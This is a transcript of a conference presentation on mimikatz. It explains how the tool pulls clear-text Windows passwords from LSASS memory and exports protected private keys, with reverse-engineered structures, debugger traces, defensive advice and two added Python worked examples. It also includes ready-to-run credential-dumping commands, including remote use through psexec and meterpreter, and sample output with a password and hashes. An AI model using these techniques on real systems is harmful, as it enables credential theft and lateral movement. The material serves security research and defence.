
mimikatz Benjamin DELPY `gentilkiwi` focus on sekurlsa/pass-the-pass

Presentation on theme: "mimikatz Benjamin DELPY `gentilkiwi` focus on sekurlsa/pass-the-pass"— Presentation transcript:

1 mimikatz - Benjamin DELPY `gentilkiwi` - focus on sekurlsa/pass-the-pass and crypto patches

2 Who ? Why ?
Benjamin DELPY `gentilkiwi`: French, 26y, Kiwi addict, lazy programmer.
Started to code mimikatz to:
  - explain security concepts;
  - improve my knowledge;
  - prove to Microsoft that sometimes they must change old habits.
Why all in French? Because I am... ;) It limits script kiddie usage. Hack with class.
07/11/2012 Benjamin DELPY ASFWS ; blog.gentilkiwi.com

3 mimikatz working
Works on XP, 2003, Vista, 2008, Seven, 2008r2, 8, Server 8; x86 & x64. Windows 2000 support was dropped with mimikatz 1.0.
Works everywhere: it is statically compiled.
Two modes: direct action (local commands), or process/driver communication.
Diagram (mimikatz.exe and its targets):
  - KeyIso "CNG Key Isolation" (LSASS.EXE): direct action, crypto::patchcng
  - SamSS "Security Accounts Manager" (LSASS.EXE): VirtualAllocEx, WriteProcessMemory, CreateRemoteThread... to load sekurlsa.dll
  - EventLog "Windows Event Log" (SVCHOST.EXE): direct action, divers::eventdrop
Injected library: open a pipe, write a welcome message, wait for commands... and return results.

4 mimikatz architecture of sekurlsa & crypto
mimikatz.exe command modules:
  mod_mimikatz_standard, mod_mimikatz_winmine, mod_mimikatz_divers, mod_mimikatz_nogpo, mod_mimikatz_crypto, mod_mimikatz_impersonate, mod_mimikatz_inject, mod_mimikatz_samdump (sam, secrets), mod_mimikatz_handle, mod_mimikatz_privilege, mod_mimikatz_system, mod_mimikatz_service, mod_mimikatz_sekurlsa (msv_1_0, tspkg, wdigest, livessp, kerberos), mod_mimikatz_process, mod_mimikatz_thread, mod_mimikatz_terminalserver
Shared modules:
  mod_parseur, mod_text, mod_cryptoapi, mod_memory, mod_secacl, mod_crypto, mod_pipe, mod_cryptoacng, mod_inject, mod_hive, mod_patch, mod_privilege, mod_system, mod_service, mod_process, mod_thread, mod_ts
Driver and injected libraries:
  mimikatz.sys, kappfree.dll, kelloworld.dll, klock.dll, sekurlsa.dll (msv_1_0, tspkg, wdigest, livessp, kerberos)

5 mimikatz :: sekurlsa what is it ?
mod_mimikatz_sekurlsa: a module replacement for my previous favorite library!
A local module that can read data from the SamSS service (the well-known LSASS process).
What the sekurlsa module can dump:
  - MSV1_0 hashes
  - TsPkg passwords
  - Wdigest passwords
  - LiveSSP passwords
  - Kerberos passwords (!)
  - ...?

6 mimikatz :: sekurlsa how LSA works (PLAYSKOOL level)
Diagram: WinLogon sends user:domain:password to LsaSS. LsaSS hands the credentials to the Authentication Packages (msv1_0, tspkg, wdigest, livessp, kerberos); msv1_0 checks against the SAM, kerberos against the KDC. Afterwards, authentication to servers is done by challenge/response.

7 mimikatz :: sekurlsa how LSA works (PLAYSKOOL level)
Authentication packages:
  - take the user's credentials from the logon;
  - make their own stuff;
  - keep enough data in memory to compute responses to challenges (Single Sign On).
If we can get that data, and inject it in another LSASS session, we avoid the authentication part. This is the principle of « Pass-the-hash »; in fact, of « Pass-the-x ».

8 mimikatz :: sekurlsa history of « pass-the-* » 1/2
Pass-the-hash
  - Unix: modified SAMBA client for hash usage; Paul Ashton (EIGEN)
  - Private version of a Windows « LSA Logon Session Editor »; Hernan Ochoa (CoreSecurity)
  - Microsoft; Marc Murray (TrueSec) presents msvctl, and provides some downloads of it
  - « Pass the hash toolkit » published; Hernan Ochoa (CoreSecurity)
  - mimikatz 0.1 includes pass the hash and is publicly available for x86 & x64 versions of Windows (yeah, by myself but in French; so not famous ;))
  - 2007 was the year of pass the hash!
Pass-the-ticket
  - 04/ wce (pass the hash toolkit evolution) provides Kerberos ticket support; Hernan Ochoa (Ampliasecurity)

9 mimikatz :: sekurlsa history of « pass-the-* » 2/2
Pass-the-pass
  - 05/2011: mimikatz 1.0 dumps the first clear text passwords from the TsPkg provider (but limited to NT 6 and some XP SP3)
  - 05/2011: return of mimikatz; it dumps clear text passwords from the WDigest provider (unlimited this time ;))
  - 05/2011: some organizations opened cases with Microsoft about it...
  - ...lots of time...
  - begin of ...: lots of blogs (and Kevin Mitnick ;)) say a few words about mimikatz
  - 03/: Hernan Ochoa (Ampliasecurity) publishes at seclists that wce supports WDigest password extraction...
  - 03/2012: mimikatz strikes again with the LiveSSP provider and extracts Live login passwords from Windows 8 memory
  - 03/2012: yeah, once again..., more curious, but Kerberos keeps passwords in memory
  - 08/2012: sekurlsa module without injection at all! (ultra safe)

10 mimikatz :: sekurlsa :: tspkg
because sometimes the hash is not enough…

11 mimikatz :: sekurlsa :: tspkg what is it ?
Microsoft introduced SSO capability for Terminal Server with NT 6 to improve the RemoteApps and RemoteDesktop users' experience. It relies on CredSSP with credential delegation (!= account delegation). Specs:
First impression: it seems cool
  - the user does not have to type their password
  - the password is not in the RDP file
  - the password is not in the user's secrets

12 mimikatz :: sekurlsa :: tspkg questions ?
The KB says that for it to work, we must enable « Default credentials » delegation.
"Default credentials: the credentials obtained when the user first logs on to Windows." What? Our User/Domain/{Password | Hash | Ticket}? It seems so... In all cases, the system seems to be vulnerable to pass-the-*... but in what form?
Our specs: [MS-CSSP] TSPasswordCreds. "The TSPasswordCreds structure contains the user's password credentials that are delegated to the server." (or PIN)
    TSPasswordCreds ::= SEQUENCE {
        domainName [0] OCTET STRING,
        userName   [1] OCTET STRING,
        password   [2] OCTET STRING
    }
Challenge/response for authentication?
  - Server: YES (TLS / Kerberos)
  - Client: NO; the *password* is sent to the server...
So the password resides somewhere in memory?
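The TSPasswordCreds structure above, as an added worked example (not code from the slides or from mimikatz): a minimal DER encoder and decoder in Python for the three-field SEQUENCE. It assumes the EXPLICIT context tagging used by [MS-CSSP] and UTF-16LE string octets, and the credentials it encodes are constructed sample values. Round-tripping a blob shows that the delegated password is carried verbatim inside the structure; only the outer TLS channel hides it, which is why the client side has to hold the password itself.

```python
"""DER encode/decode of the CredSSP TSPasswordCreds SEQUENCE ([MS-CSSP]).

Added example; not part of mimikatz. Assumes EXPLICIT context tagging
([n] wrapping a primitive OCTET STRING) and UTF-16LE string contents.
"""

FIELD_NAMES = ("domainName", "userName", "password")   # tags [0], [1], [2]


def _der_length(n: int) -> bytes:
    """DER definite-form length: short form below 0x80, long form otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _tlv(tag: int, body: bytes) -> bytes:
    """Tag + length + value."""
    return bytes([tag]) + _der_length(len(body)) + body


def encode_ts_password_creds(domain: str, user: str, password: str) -> bytes:
    """Build the SEQUENCE; each field is [i] EXPLICIT around an OCTET STRING."""
    fields = []
    for index, value in enumerate((domain, user, password)):
        octet_string = _tlv(0x04, value.encode("utf-16-le"))
        fields.append(_tlv(0xA0 | index, octet_string))    # context, constructed
    return _tlv(0x30, b"".join(fields))


def _read_tlv(buf: bytes, pos: int):
    """Return (tag, value, position after the value) for the TLV at buf[pos]."""
    tag = buf[pos]
    first = buf[pos + 1]
    pos += 2
    if first & 0x80:                       # long-form length
        width = first & 0x7F
        length = int.from_bytes(buf[pos:pos + width], "big")
        pos += width
    else:
        length = first
    end = pos + length
    if end > len(buf):
        raise ValueError("truncated TLV")
    return tag, buf[pos:end], end


def decode_ts_password_creds(der: bytes) -> dict:
    """Parse a TSPasswordCreds blob into its three string fields."""
    tag, seq, end = _read_tlv(der, 0)
    if tag != 0x30 or end != len(der):
        raise ValueError("not a single TSPasswordCreds SEQUENCE")
    out = {}
    pos = 0
    while pos < len(seq):
        ctx_tag, inner, pos = _read_tlv(seq, pos)
        index = ctx_tag & 0x1F
        if (ctx_tag & 0xE0) != 0xA0 or index >= len(FIELD_NAMES):
            raise ValueError(f"unexpected tag 0x{ctx_tag:02x}")
        str_tag, value, _ = _read_tlv(inner, 0)
        if str_tag != 0x04:
            raise ValueError("field is not an OCTET STRING")
        out[FIELD_NAMES[index]] = value.decode("utf-16-le")
    if set(out) != set(FIELD_NAMES):
        raise ValueError("missing field")
    return out


def password_in_clear(der: bytes, password: str) -> bool:
    """True when the UTF-16LE bytes of the password appear verbatim in the blob."""
    return password.encode("utf-16-le") in der


if __name__ == "__main__":
    # Constructed sample credentials, not real ones.
    blob = encode_ts_password_creds("LAB", "kiwi", "S3cret!")
    print(blob.hex())
    print(decode_ts_password_creds(blob))
    print("password visible in the encoding:", password_in_clear(blob, "S3cret!"))
```

The decoder rejects anything that is not exactly one SEQUENCE of the three tagged OCTET STRINGs, so it can also be used as a strict check on captured structures once the TLS layer has been removed in a lab.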

13 mimikatz :: sekurlsa :: tspkg symbols & theory
Let's explore some symbols! Sounds cool... (thanks Microsoft)
    kd> x tspkg!*clear*
    75016d1c tspkg!TSObtainClearCreds = <no type information>
    kd> x tspkg!*password*
    75011b tspkg!TSDuplicatePassword = <no type information>
    75011cd tspkg!TSHidePassword = <no type information>
    750195ee tspkg!TSRevealPassword = <no type information>
    75012fbd tspkg!TSUpdateCredentialsPassword = <no type information>
    kd> x tspkg!*locate*
    b tspkg!TSCredTableLocateDefaultCreds = <no type information>
Let's imagine a scenario:
  - Enumerate all sessions to obtain: username, domain, LUID
  - Call tspkg!TSCredTableLocateDefaultCreds (relies on RtlLookupElementGenericTableAvl) with the LUID to obtain: TS_CREDENTIAL
  - Call tspkg!TSObtainClearCreds (relies on LsaUnprotectMemory) with the TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) to obtain: TS_PRIMARY_CREDENTIAL with clear text credentials...

14 mimikatz :: sekurlsa :: tspkg workflow
LsaEnumerateLogonSessions -> for each LUID -> tspkg!TSGlobalCredTable -> RtlLookupElementGenericTableAvl -> KIWI_TS_CREDENTIAL -> KIWI_TS_PRIMARY_CREDENTIAL -> LsaUnprotectMemory -> password in clear!

    /* reverse-engineered layouts (unk* fields are unknown padding); the primary
       credential is declared first so the pointer type below resolves */
    typedef struct _KIWI_TS_PRIMARY_CREDENTIAL {
        PVOID unk0;
        LSA_UNICODE_STRING Domaine;
        LSA_UNICODE_STRING UserName;
        LSA_UNICODE_STRING Password;
    } KIWI_TS_PRIMARY_CREDENTIAL, *PKIWI_TS_PRIMARY_CREDENTIAL;

    typedef struct _KIWI_TS_CREDENTIAL {
    #ifdef _M_X64
        BYTE unk0[108];
    #elif defined _M_IX86
        BYTE unk0[64];
    #endif
        LUID LocallyUniqueIdentifier;
        PVOID unk1;
        PVOID unk2;
        PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary;
    } KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL;

15 mimikatz :: sekurlsa :: tspkg demo time !

16 mimikatz :: sekurlsa :: wdigest
because a clear text password over http/https is not cool

17 mimikatz :: sekurlsa :: wdigest what is it ?
Wikipedia: "Digest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a user's web browser. It applies a hash function to a password before sending it over the network […]"
Microsoft: "Common Digest Authentication Scenarios: Authenticated client access to a Web site; Authenticated client access using SASL; Authenticated client access with integrity protection to a directory service using LDAP"
Again, it seems cool:
  - no password over the network, just hashes
  - no reversible password in Active Directory; hashes for each realm (only with Advanced Digest authentication)

18 mimikatz :: sekurlsa :: wdigest what is it ?
We speak about hashes, but what hashes?
    H   = MD5(HA1:nonce:[…]:HA2)
    HA1 = MD5(username:realm:password)
    HA2 = MD5(method:digestURI:[…])
Even after login, HA1 may change: the realm comes from the server side and cannot be determined before the Windows logon.
So the WDigest provider must have the elements to compute responses for different servers: username, realm (from the server), password.
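To make the point of slides 7 and 18 concrete (an authentication package must keep enough material to answer any server's challenge, and for Digest that material depends on a realm chosen by the server), here is an added Python example, not from the slides or from mimikatz, that computes HA1, HA2 and the Digest response as defined in RFC 2617. The function ha1_reusable_across_realms checks whether an HA1 cached for one realm answers a challenge from another realm; the realm names and nonces it is called with are constructed, and the RFC 2617 section 3.5 example is used to check the computation itself.

```python
"""RFC 2617 Digest computation and the realm dependence of HA1.

Added example; not mimikatz code. Shows why a provider that wants SSO to
arbitrary Digest servers must keep the password (or one HA1 per realm).
"""
import hashlib


def _md5_hex(text: str) -> str:
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def ha1(username: str, realm: str, password: str) -> str:
    """HA1 = MD5(username:realm:password); realm is dictated by the server."""
    return _md5_hex(f"{username}:{realm}:{password}")


def ha2(method: str, digest_uri: str) -> str:
    """HA2 = MD5(method:digestURI) for qop=auth or no qop."""
    return _md5_hex(f"{method}:{digest_uri}")


def response_from_ha1(h1: str, nonce: str, method: str, uri: str,
                      qop: str = None, nc: str = None, cnonce: str = None) -> str:
    """What a client can compute once it holds HA1 for the challenged realm."""
    h2 = ha2(method, uri)
    if qop:    # RFC 2617 form: nonce-count and client nonce are mixed in
        return _md5_hex(f"{h1}:{nonce}:{nc}:{cnonce}:{qop}:{h2}")
    return _md5_hex(f"{h1}:{nonce}:{h2}")    # RFC 2069 compatibility form


def digest_response(username: str, realm: str, password: str, nonce: str,
                    method: str, uri: str, qop: str = None, nc: str = None,
                    cnonce: str = None) -> str:
    """Full computation from the password, as the provider must do it."""
    return response_from_ha1(ha1(username, realm, password), nonce, method,
                             uri, qop, nc, cnonce)


def ha1_reusable_across_realms(username: str, password: str, cached_realm: str,
                               challenge_realm: str, nonce: str, method: str,
                               uri: str) -> bool:
    """True only if HA1 cached for cached_realm answers challenge_realm's challenge."""
    cached = ha1(username, cached_realm, password)
    attempt = response_from_ha1(cached, nonce, method, uri)
    expected = digest_response(username, challenge_realm, password, nonce, method, uri)
    return attempt == expected


if __name__ == "__main__":
    # Constructed sample values; "nonce-123" stands in for a server-issued nonce.
    print("same realm  :", ha1_reusable_across_realms("kiwi", "S3cret!", "realm-a",
                                                       "realm-a", "nonce-123", "GET", "/"))
    print("other realm :", ha1_reusable_across_realms("kiwi", "S3cret!", "realm-a",
                                                       "realm-b", "nonce-123", "GET", "/"))
```

The second call returns False: a cached HA1 is bound to one realm, so a provider offering SSO to any Digest server either keeps the password itself or keeps a table of HA1 values keyed by realm, which is the design trade-off the slides describe.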

19 mimikatz :: sekurlsa :: wdigest theory
This time, we know:
  - that WDigest keeps the password in memory « by protocol », for the HA1 digest;
  - that LSASS loves to unprotect passwords with LsaUnprotectMemory (so it protects them with LsaProtectMemory):
      LsaProtectMemory   at offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE
      LsaUnprotectMemory at offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE
Let's search in WDigest:
    .text:74096C69 call dword ptr [eax+0B0h]
    .text:7409D call dword ptr [eax+0B4h]
Hypothesis seems verified: SpAcceptCredentials takes the clear password in its arguments, protects it with LsaProtectMemory, and updates or inserts data in a doubly linked list: wdigest!l_LogSessList

20 mimikatz :: sekurlsa :: wdigest workflow
LsaEnumerateLogonSessions -> for each LUID -> wdigest!l_LogSessList -> search the linked list for the LUID -> KIWI_WDIGEST_LIST_ENTRY -> LsaUnprotectMemory -> password in clear!

    /* reverse-engineered layout; […] marks fields not shown on the slide */
    typedef struct _KIWI_WDIGEST_LIST_ENTRY {
        struct _KIWI_WDIGEST_LIST_ENTRY *Flink;
        struct _KIWI_WDIGEST_LIST_ENTRY *Blink;
        DWORD UsageCount;
        struct _KIWI_WDIGEST_LIST_ENTRY *This;
        LUID LocallyUniqueIdentifier;
        […]
        LSA_UNICODE_STRING UserName;
        LSA_UNICODE_STRING Domaine;
        LSA_UNICODE_STRING Password;
    } KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY;

21 mimikatz :: sekurlsa :: wdigest demo time !

22 mimikatz :: sekurlsa :: livessp
because Microsoft was too good in closed networks

23 mimikatz :: sekurlsa :: livessp how
Until now I have only used a logical (empirical) approach to search for passwords: protocol reading, symbol searching... ~ Boring ~... Let's be more brutal this time: make a WinDbg trap!
    0: kd> !process 0 0 lsass.exe
    PROCESS  SessionId: 0  Cid:   Peb: 7f43f000  ParentCid: 01b4
        DirBase: 5df  ObjectTable: 80ce4740  HandleCount: <Data Not Accessible>
        Image: lsass.exe
    0: kd> .process /i
    You need to continue execution (press 'g' <enter>) for the context to be switched. When the debugger breaks in again, you will be in the new process context.
    0: kd> g
    Break instruction exception - code (first chance)
    nt!RtlpBreakWithStatusInstruction:
    814b39d0 cc              int     3
    0: kd> .reload /user
    Loading User Symbols
    0: kd> bp lsasrv!LsaProtectMemory "kc 5 ; g"

24 mimikatz :: sekurlsa :: livessp how
Let's log in with a Live account on Windows 8!
Trap output (kc 5 at each LsaProtectMemory hit; frames, top first):
    lsasrv!LsaProtectMemory
    livessp!LiveMakeSupplementalCred
    livessp!LiveMakeSecPkgCredentials
    livessp!LsaApLogonUserEx2
    livessp!SpiLogonUserEx2
    msv1_0!NlpAddPrimaryCredential
    msv1_0!SspAcceptCredentials
    msv1_0!SpAcceptCredentials
    tspkg!TSHidePassword
    tspkg!SpAcceptCredentials
Our LiveSSP provider: after credential protection, LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest).
    1: kd> uf /c livessp!LsaApLogonUserEx2
    livessp!LsaApLogonUserEx2 ( )
    [...]
    livessp!LsaApLogonUserEx2+0x560 (74781a96): call to livessp!LiveCreateLogonSession ( )
Yeah, pass-the-hash capability with Live accounts too... a Live user can log on through RDP via SSO.

25 mimikatz :: sekurlsa :: livessp workflow
LsaEnumerateLogonSessions -> for each LUID -> livessp!LiveGlobalLogonSessionList -> search the linked list for the LUID -> KIWI_LIVESSP_LIST_ENTRY -> KIWI_LIVESSP_PRIMARY_CREDENTIAL -> LsaUnprotectMemory -> password in clear!

    /* reverse-engineered layouts (unk* fields are unknown padding); the primary
       credential is declared first so the pointer type below resolves */
    typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {
        DWORD isSupp;
        DWORD unk0;
        LSA_UNICODE_STRING UserName;
        LSA_UNICODE_STRING Domaine;
        LSA_UNICODE_STRING Password;
    } KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;

    typedef struct _KIWI_LIVESSP_LIST_ENTRY {
        struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
        struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
        PVOID unk0;
        PVOID unk1;
        PVOID unk2;
        PVOID unk3;
        DWORD unk4;
        DWORD unk5;
        PVOID unk6;
        LUID LocallyUniqueIdentifier;
        LSA_UNICODE_STRING UserName;
        PVOID unk7;
        PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
    } KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;

26 mimikatz :: sekurlsa
Even if we already have tools for normal accounts, aren't you curious to test one with this trap?* (* Me, yes)

27 mimikatz :: sekurlsa :: kerberos
Let's log in with a normal account.
Trap output (kc 5 at each LsaProtectMemory hit; frames, top first):
    lsasrv!LsaProtectMemory
    kerberos!KerbHideKey
    kerberos!KerbCreatePrimaryCredentials
    kerberos!KerbCreateLogonSession
    kerberos!SpAcceptCredentials
    kerberos!KerbHidePassword
    msv1_0!NlpAddPrimaryCredential
    msv1_0!SspAcceptCredentials
    msv1_0!SpAcceptCredentials
    wdigest!SpAcceptCredentials
    tspkg!TSHidePassword
    tspkg!SpAcceptCredentials
After credential protection, KerbCreateLogonSession calls:
  - NT6: KerbInsertOrLocateLogonSession, to insert data in KerbGlobalLogonSessionTable
  - NT5: KerbInsertLogonSession, to insert data in KerbLogonSessionList
Kerberos, ticket part? Maybe ;) Kerberos part for a password??????

28 mimikatz :: sekurlsa :: kerberos (nt6) workflow
LsaEnumerateLogonSessions -> for each LUID -> kerberos!KerbGlobalLogonSessionTable -> RtlLookupElementGenericTableAvl -> KIWI_KERBEROS_PRIMARY_CREDENTIAL -> LsaUnprotectMemory -> password in clear!

    /* reverse-engineered layout (unk* fields are unknown padding); unk5 is
       split per architecture here, following the unk4 pattern, where the slide
       listed both sizes on one line */
    typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL {
        DWORD unk0;
        PVOID unk1;
        PVOID unk2;
        PVOID unk3;
    #ifdef _M_X64
        BYTE unk4[32];
    #elif defined _M_IX86
        BYTE unk4[20];
    #endif
        LUID LocallyUniqueIdentifier;
    #ifdef _M_X64
        BYTE unk5[44];
    #elif defined _M_IX86
        BYTE unk5[36];
    #endif
        LSA_UNICODE_STRING UserName;
        LSA_UNICODE_STRING Domaine;
        LSA_UNICODE_STRING Password;
    } KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL;

29 mimikatz :: sekurlsa :: kerberos (nt5) workflow
LsaEnumerateLogonSessions -> for each LUID -> kerberos!KerbLogonSessionList -> search the linked list for the LUID -> KIWI_KERBEROS_LOGON_SESSION -> LsaUnprotectMemory -> password in clear!

    /* reverse-engineered layout; […] marks fields not shown on the slide */
    typedef struct _KIWI_KERBEROS_LOGON_SESSION {
        struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
        struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
        DWORD UsageCount;
        PVOID unk0;
        PVOID unk1;
        PVOID unk2;
        DWORD unk3;
        DWORD unk4;
        PVOID unk5;
        PVOID unk6;
        PVOID unk7;
        LUID LocallyUniqueIdentifier;
    #ifdef _M_IX86
        DWORD unk8;
    #endif
        DWORD unk9;
        DWORD unk10;
        PVOID unk11;
        DWORD unk12;
        DWORD unk13;
        PVOID unk14;
        PVOID unk15;
        PVOID unk16;
        […]
        LSA_UNICODE_STRING UserName;
        LSA_UNICODE_STRING Domaine;
        LSA_UNICODE_STRING Password;
    } KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;

30 mimikatz :: sekurlsa demo time !
Final sekurlsa demo: sekurlsa::logonPasswords full

31 mimikatz :: sekurlsa :: kerberos “hu ?”
OK, it works...* but why? (* not for all logons on NT5: it can need an unlock)
From my understanding of Microsoft's explanations, there is no need for passwords in the Kerberos protocol... all is based on the hash (not very sexy either).
Microsoft's implementation of Kerberos is full of logic...
  - For password auth: the password hash is the shared secret, but the password is kept in memory
  - For full smartcard auth: no password on the client; no hash on the client? The NTLM hash is on the client... the KDC sent it back as a gift

32 mimikatz :: sekurlsa
All passwords in memory are encrypted, but in a reversible way, so that they can be used.
We used LsaUnprotectMemory, in the LSASS context, to decrypt them. This function relies on LsaEncryptMemory from lsasrv.dll.
For that, we previously injected a DLL (sekurlsa.dll) into the LSASS process, to benefit from its keys when we called it.
Can it be fun to decrypt outside the process? Yes, it is... no more injection, just reading the memory of the LSASS process: mimikatz can use lsasrv.dll too and "imports" the keys initialized by LSASS. When we call LsaEncryptMemory in mimikatz, with all keys imported from LSASS, we get the same behaviour as when we are in LSASS!

33 mimikatz :: sekurlsa LsaEncryptMemory NT5
Depending on the size of the secret, LsaEncryptMemory uses RC4 or DESx.
Key material in lsass (lsasrv), copied into mimikatz's own lsasrv:
  - RC4: g_cbRandomKey (DWORD; 256), g_pRandomKey (@BYTE[g_cbRandomKey])
  - DESx: g_pDESXKey (@BYTE[144]), g_Feedback (BYTE[8])

34 mimikatz :: sekurlsa LsaEncryptMemory NT6
Depending on the size of the secret, LsaEncryptMemory uses 3DES or AES.
Key material in lsass (lsasrv), copied into mimikatz's own lsasrv:
  - InitializationVector: BYTE[16]
  - h3DesKey, hAesKey: KIWI_BCRYPT_KEY handles whose key data (cle) is copied

    /* reverse-engineered layouts (unk* fields are unknown padding) */
    typedef struct _KIWI_BCRYPT_KEY_DATA {
        DWORD size;
        DWORD tag;
        DWORD type;
        DWORD unk0;
        DWORD unk1;
        DWORD unk2;
        DWORD unk3;
        PVOID unk4;
        BYTE data; /* etc... */
    } KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;

    typedef struct _KIWI_BCRYPT_KEY {
        DWORD size;
        DWORD type;
        PVOID unk0;
        PKIWI_BCRYPT_KEY_DATA cle;
        PVOID unk1;
    } KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;

35 mimikatz :: sekurlsa memo
Security packages:
    Package          Symbols                                                   Type
    tspkg            tspkg!TSGlobalCredTable                                   RTL_AVL_TABLE
    wdigest          wdigest!l_LogSessList                                     LIST_ENTRY
    livessp          livessp!LiveGlobalLogonSessionList                        LIST_ENTRY
    kerberos (nt5)   kerberos!KerbLogonSessionList                             LIST_ENTRY
    kerberos (nt6)   kerberos!KerbGlobalLogonSessionTable                      RTL_AVL_TABLE
    msv1_0           lsasrv!LogonSessionList / lsasrv!LogonSessionListCount    LIST_ENTRY / ULONG
Protection keys:
    NT 5   Key    Symbols
           RC4    lsasrv!g_cbRandomKey, lsasrv!g_pRandomKey
           DESx   lsasrv!g_pDESXKey, lsasrv!g_Feedback
    NT 6   Key    Symbols
           (IV)   lsasrv!InitializationVector
           3DES   lsasrv!h3DesKey
           AES    lsasrv!hAesKey

36 mimikatz :: sekurlsa memo
Some commands:
    mimikatz privilege::debug "sekurlsa::logonPasswords full" exit
    psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe "sekurlsa::logonPasswords full" exit
    meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe
Sample output:
    mimikatz 1.0 x64 (RC)   /* Traitement du Kiwi (Aug  :32:28) */
    //
    mimikatz # privilege::debug
    Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK
    mimikatz # sekurlsa::logonPasswords full
    Authentification Id         : 0;234870
    Package d'authentification  : NTLM
    Utilisateur principal       : Gentil Kiwi
    Domaine d'authentification  : vm-w8-rp-x
            msv1_0 :
             * Utilisateur  : Gentil Kiwi
             * Domaine      : vm-w8-rp-x
             * Hash LM      : d0e9aee149655a6075e4540af1f22d3b
             * Hash NTLM    : cc36cf7a efccd b1a
            kerberos :
             * Mot de passe : waza1234/
            wdigest :
            tspkg :
            livessp :
                    n.t. (LUID KO)

37 mimikatz :: sekurlsa what can we do ?
Basics:
  - No physical access to computers (the first step to pass the hash, then pass the pass)
  - No admin rights / system rights / debug privileges (…)
  - Disable local admin accounts
  - Strong passwords (haha, it was a joke; so useless!!!)
  - For privileged accounts, network logon instead of interactive (when possible)
  - Audit; pass the hash leaves traces and can lock accounts
  - No admin rights / system rights / debug privileges, even for VIPs
  - Use a separate network (or forest) for privileged tasks
More in depth:
  - Force strong authentication (SmartCard & Token): $ / €
  - Short validity for Kerberos tickets
  - No delegation
  - Disable NTLM (available with NT6)
  - Nothing exotic: no biometrics (it keeps the password somewhere and pushes it to Windows), no single sign on
  - Stop using shared secrets for authentication: push public/private stuff (like keys ;))
  - Leave opportunities to stop retro-compatibility
  - Disable faulty providers? Is it supported by Microsoft? Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?

38 mimikatz :: crypto what is it ?
mod_mimikatz_crypto: a little module that I wrote to:
  - play with the Windows Cryptographic API / CNG and RSA keys
  - automate the export of certificates/keys, even those which are "not" exportable
What the crypto module can do:
  - List providers, stores, certificates, keys
  - Export: public part in DER format, with private keys in PFX format; private keys in PVK format (it's cool, OpenSSL can deal with it too)
  - Patch: CryptoAPI in the mimikatz context; CNG in the LSASS context (again!)

39 mimikatz :: crypto how it’s protected
Private keys are DPAPI protected: you cannot reuse private key files on another computer, at least not without the master keys and/or the users' passwords.
A computer/user can load its own keys because it has enough secrets to do it (ex: session opened). Yes, a computer/server opens a "session".
Export/usage can be limited by:
  - Password popup
  - Export/Archive flag not present: a constraint for most users; unavailable for computer keys
        certutil -importpfx mycert.p12 NoExport
        certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport

40 mimikatz :: crypto :: capi how it works
"Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware."
Processes (mimikatz, IIS, Active Directory, Internet Explorer, yourappshere...) load some DLLs to deal with the different cryptographic stuff: CSP (keys), smartcard readers, ... cryptdll.dll, rsaenh.dll, ...
The process deals with cryptographic keys through this API...

41 mimikatz :: crypto :: capi how it’s exported (PLAYSKOOL level)
Diagram: everything happens inside the process, in CryptoAPI and the RSA CSP:
  - load private key -> DPAPI decode -> exportable?
  - yes: ask to export key -> exported key
  - no: NTE_BAD_KEY_STATE

42 mimikatz :: crypto :: patchcapi because I own my process
When we want to export a certificate with its private key (or only the key), it goes into rsaenh!CPExportKey. This function does all the work to prepare the export, and checks whether the key is exportable. Exportable?
certutil output:
    ================ Certificat 0 ================
    Numéro de série : a1c3ef46a301f99385f50680fa0
    Émetteur: CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
    Objet: CN=Benjamin Delpy, C=FR
    Il ne s'agit pas d'un certificat racine
    Hach. cert. (sha1): ab 9e 92 b9 43 ed 47 d9 15 bc e 24 a ac aa 7e
    Conteneur de clé = {470ADFBA B05E-B30776B75A03}
    Fournisseur = Microsoft Enhanced Cryptographic Provider v1.0
    La clé privée NE PEUT PAS être exportée
    Succès du test de cryptage
    CertUtil : -exportPFX ÉCHEC de la commande : 0x b ( )
    CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.
mimikatz output:
    mimikatz # crypto::exportCertificates
    Emplacement : 'CERT_SYSTEM_STORE_CURRENT_USER'\My
     - Benjamin Delpy
            Container Clé : {470ADFBA B05E-B30776B75A03}
            Provider : Microsoft Enhanced Cryptographic Provider v1.0
            Type : AT_KEYEXCHANGE
            Exportabilité : NON
            Taille clé : 2048
            Export privé dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO (0x b) Clé non valide pour l'utilisation dans l'état spécifié.
